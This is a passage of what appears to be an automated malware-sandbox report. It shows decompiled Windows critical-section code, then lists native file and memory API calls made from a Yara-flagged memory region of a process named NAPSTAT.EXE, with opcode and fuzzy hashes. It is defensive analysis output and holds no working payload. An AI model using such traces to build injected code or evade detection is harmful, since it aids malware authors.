				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E1E9ADA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x1ea7793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E1E9916C0(_t39);
				} else {
					_t40 = E1E98F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E1E9D3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E1E9901A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x1ea7793c; // 0x0
								_push(_t85);
								_t44 = E1E991F28(_t71);
							} else {
								_t44 = E1E98F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E1E9D3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E1EA12306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E1E9BEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E1E9D4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E1E9E3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E1E9E3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x1ea720c0;
								if(_t85 != 0x1ea720c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E1EA1217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E1E9E3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                    0x1e9bec56
                    0x1e9bec56
                    0x1e9bec56
                    0x1e9bec5c
                    0x1e9bec64
                    0x1e9f23e6
                    0x1e9f23eb
                    0x1e9f23eb
                    0x1e9bec6a
                    0x1e9bec6c
                    0x1e9bec6f
                    0x1e9f23f3
                    0x1e9f23f8
                    0x1e9f23fa
                    0x1e9f23fc
                    0x1e9bec75
                    0x1e9bec76
                    0x1e9bec76
                    0x1e9bec7b
                    0x1e9bec7c
                    0x1e9bec7e
                    0x1e9f2406
                    0x1e9f2407
                    0x1e9f240c
                    0x1e9f240d
                    0x1e9f240d
                    0x1e9f240d
                    0x1e9f2414
                    0x1e9f2417
                    0x1e9f241e
                    0x1e9f2435
                    0x1e9f2438
                    0x1e9f243c
                    0x1e9f243f
                    0x1e9f2442
                    0x1e9f2443
                    0x1e9f2446
                    0x1e9f2449
                    0x1e9f2453
                    0x1e9f2455
                    0x1e9f245b
                    0x1e9f245b
                    0x1e9beb99
                    0x1e9beb99
                    0x1e9beb9c
                    0x1e9beb9d
                    0x1e9beb9f
                    0x1e9beba2
                    0x1e9f2465
                    0x1e9f246b
                    0x1e9f246d
                    0x1e9beba8
                    0x1e9beba9
                    0x1e9beba9
                    0x1e9bebae
                    0x1e9bebb3
                    0x1e9bebb9
                    0x1e9bebbb
                    0x1e9f2513
                    0x1e9f2514
                    0x1e9f2519
                    0x1e9f251b
                    0x1e9bec2a
                    0x1e9bec2d
                    0x1e9bec33
                    0x1e9bec36
                    0x1e9bec3a
                    0x1e9bec3e
                    0x1e9bec40
                    0x1e9bec47
                    0x1e9bec47
                    0x1e9bec40
                    0x1e9922c6
                    0x1e9bebc1
                    0x1e9bebc1
                    0x1e9bebc5
                    0x1e9bec9a
                    0x1e9bec9a
                    0x1e9bebd6
                    0x1e9bebd6
                    0x00000000
                    0x1e9bebbb
                    0x1e9f2477
                    0x1e9f247c
                    0x1e9f2486
                    0x1e9f248b
                    0x1e9f2496
                    0x1e9f249b
                    0x1e9f249d
                    0x1e9f24a0
                    0x1e9f24a3
                    0x1e9f24aa
                    0x1e9f24aa
                    0x1e9f24a5
                    0x1e9f24a5
                    0x1e9f24a5
                    0x1e9f24ac
                    0x1e9f24af
                    0x1e9f24b0
                    0x1e9f24b3
                    0x1e9f24b9
                    0x1e9f24ba
                    0x1e9f24bb
                    0x1e9f24c6
                    0x1e9f24cb
                    0x1e9f24cd
                    0x1e9f24d0
                    0x1e9f24d1
                    0x1e9f24d4
                    0x1e9f24d6
                    0x1e9f24d9
                    0x1e9f24d9
                    0x1e9f24dc
                    0x1e9f24df
                    0x1e9f24e1
                    0x1e9f24e7
                    0x1e9f24e9
                    0x1e9f24ec
                    0x1e9f24ef
                    0x1e9f24f2
                    0x1e9f24f2
                    0x1e9f24ef
                    0x1e9f24e7
                    0x1e9f24fa
                    0x1e9f24ff
                    0x1e9f2501
                    0x1e9f2503
                    0x1e9f2506
                    0x1e9f250b
                    0x1e9beb8c
                    0x1e9beb93
                    0x00000000
                    0x00000000
                    0x1e9beb93
                    0x00000000
                    0x1e9beb99
                    0x1e9bec85
                    0x1e9bec85
                    0x1e9bec85
                    0x00000000

                    Strings
                    • RTL: Re-Waiting, xrefs: 1E9F24FA
                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 1E9F24BD
                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 1E9F248D
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID:
                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                    • API String ID: 0-3177188983
                    • Opcode ID: 80c362371adb7f9b8ff62ca740fdd36443f634c058242ceff23e45558dbf723c
                    • Instruction ID: 78217c946e3aa812d407cdb4e3b6f309cf6cc951fcf05e1075b2e1c5a8dccc54
                    • Opcode Fuzzy Hash: 80c362371adb7f9b8ff62ca740fdd36443f634c058242ceff23e45558dbf723c
                    • Instruction Fuzzy Hash: C541B0B4A00248EBDB10DBA5CC84FAA7BADAF84720F108B4DF5599B3C0D775E9418F65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Analysis Process: NAPSTAT.EXE PID: 1840 Parent PID: 1388 NAPSTAT.EXECOMMON

                    Executed Functions

                    Function 00099D50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00099D9D
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`$wK
                    • API String ID: 823142352-635088003
                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction ID: 0a441b4dce64d7bec0249cb88b86821ea0342ac4fd6d7c1531e9a6fcd94e2e80
                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction Fuzzy Hash: 60F0BDB2200208AFCB08CF88DC95EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00099D4B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00099D9D
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`$wK
                    • API String ID: 823142352-635088003
                    • Opcode ID: c5eada3fde6041dd41a8304a6df54e10c95515091d94004dfce0eb1109ed1a57
                    • Instruction ID: b4e28f81552dabf8d26079c265d62c16fd98c5fab384b920943907eb4ff142bf
                    • Opcode Fuzzy Hash: c5eada3fde6041dd41a8304a6df54e10c95515091d94004dfce0eb1109ed1a57
                    • Instruction Fuzzy Hash: 1FF0B6B2204149ABCB08DF98DD85CDBB7ADBF8C354B05864CFA5D93201D630E8518BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00099DA4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00099D9D
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`$wK
                    • API String ID: 823142352-635088003
                    • Opcode ID: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                    • Instruction ID: 72a27c67d75c62c2b748e7d4a7c187b675e4c59541f47ddf6178da0e82cfd5df
                    • Opcode Fuzzy Hash: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                    • Instruction Fuzzy Hash: BBF06CB2215109AF8B58DF9CD890DEB73F9BF8C354B159648FA4D93201D631E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00099E00, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtReadFile.NTDLL(?,?,FFFFFFFF,000949F1,?,?,?,?,000949F1,FFFFFFFF,?,2M,?,00000000), ref: 00099E45
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction ID: fead514cabe4814d174c9c8fb60ffadff092d031a689921e6f23a6cb00221d16
                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction Fuzzy Hash: 10F0A4B2200208AFCB14DF89DC91EEB77ADAF8C754F158248BE1D97241D630E8118BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00099DFE, Relevance: 1.5, APIs: 1, Instructions: 35filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtReadFile.NTDLL(?,?,FFFFFFFF,000949F1,?,?,?,?,000949F1,FFFFFFFF,?,2M,?,00000000), ref: 00099E45
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 06d8c114a73e8788155844279abf97e391ef936e158bdf3e01102b5bdcd53d6e
                    • Instruction ID: 15814952b34f15fadc7ea73fb5bf1213ce15886017840d43c7bd674ad2d8b0e3
                    • Opcode Fuzzy Hash: 06d8c114a73e8788155844279abf97e391ef936e158bdf3e01102b5bdcd53d6e
                    • Instruction Fuzzy Hash: F7F0A4B6200108AFCB14DF89DC91EEB77A9AF8C354F168649BE1DA7251C630E8118BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00099F2B, Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F69
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: 784c957765819ddfb962bf8d62287b0d1054649d66780c930414214927f2c729
                    • Instruction ID: 2dddf084dcba1ec77312e3149dd3078b319210c9a9e876e468a01dc41263e8ba
                    • Opcode Fuzzy Hash: 784c957765819ddfb962bf8d62287b0d1054649d66780c930414214927f2c729
                    • Instruction Fuzzy Hash: 27F052B2210218AFCB18DF88DC91EEB77ADAF88310F158208FE1C97241C630E910CBE0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00099F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F69
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction ID: 49c918a45e5b2d10f2cbb8b42365379f4a3975464c59e5165204c3099a04dbe1
                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction Fuzzy Hash: 67F015B2200208AFCB14DF89CC81EEB77ADAF88750F118148BE1897241C630F810CBE0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00099E7A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtClose.NTDLL(00094D10,?,?,00094D10,00000000,FFFFFFFF), ref: 00099EA5
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: bc5b2de0da1b5ef0375440ba87564657268f0f0a75ea414756b91c00acfdd9db
                    • Instruction ID: ab6ea4d880ad19167aef1d36909cc263392c85e41cc02b06a8518bfe265f1311
                    • Opcode Fuzzy Hash: bc5b2de0da1b5ef0375440ba87564657268f0f0a75ea414756b91c00acfdd9db
                    • Instruction Fuzzy Hash: A5E08C35200104AFDB10EFA8CC8AEE7BB68EF48350F064199BA5C9B242C631A6508690
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00099E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtClose.NTDLL(00094D10,?,?,00094D10,00000000,FFFFFFFF), ref: 00099EA5
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction ID: 7bafa5a8a84721917e68a6eceee91e07c96d2fc345112c48b1fd92cb674e3066
                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction Fuzzy Hash: 38D01776600214ABDB10EB98CC86EE77BACEF49760F154499BA5C9B242C530FA0086E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 020B00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 020B07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 020AFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 020AFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 020AFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 020AF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 020AF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 020AFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp Download File
